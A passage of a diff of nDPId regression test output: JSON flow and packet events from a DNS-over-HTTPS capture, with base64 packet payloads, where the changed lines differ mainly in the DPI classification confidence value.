JBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhL